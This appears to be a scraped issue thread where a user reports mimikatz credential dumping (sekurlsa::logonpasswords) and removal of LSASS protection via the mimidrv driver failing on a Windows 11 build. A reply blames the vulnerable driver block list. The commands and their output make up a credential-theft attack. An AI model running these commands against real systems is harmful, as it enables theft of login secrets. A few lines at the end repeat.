Windows 11 Build 10.0.22621.1848

Question

Windows 11 Build 10.0.22621.1848

GjBrutello opened this issue a year ago · comments

GjBrutello commented a year ago

Hello! In the last Windows build I get error:
mimikatz(commandline) # privilege::debug
Privilege '20' OK

mimikatz(commandline) # sekurlsa::logonpasswords
ERROR kuhl_m_sekurlsa_acquireLSA ; Logon list

Also trying to unlock lsass:

mimikatz(commandline) # privilege::debug
Privilege '20' OK

mimikatz(commandline) # !+
[*] 'mimidrv' service not present
[+] 'mimidrv' service successfully registered
[+] 'mimidrv' service ACL to everyone
ERROR kull_m_service_install ; StartService (0x800b010c)

mimikatz(commandline) # !processprotect /remove /process:LSASS.EXE
Process : LSASS.EXE
PID 1232 -> 00/00 [0-0-0]
ERROR kull_m_kernel_ioctl ; CreateFile (0x00000002)

mimikatz(commandline) # exit
Bye!

It seems the new Windows 11 does not allow to create a service without a digital signature.
Windows 11 Build 10.0.22621.1848

GjBrutello · Answer 1 · Tue Aug 01 2023 23:02:33 GMT+0800 (China Standard Time)

Mimikatz 2.2.0 20220919 Djoin parser & Citrix SSO Extractor, Sep 19, 2022. Tried other versions but the same result.

Lennart · Answer 2 · Fri Aug 04 2023 16:14:05 GMT+0800 (China Standard Time)

Your error when installing the service resolves to CERT_E_REVOKED. This is likely due to the vulnerable driver block list.

Windows 11 Build 10.0.22621.1848

mimikatz(commandline) # exit Bye!

mimikatz(commandline) # exit
Bye!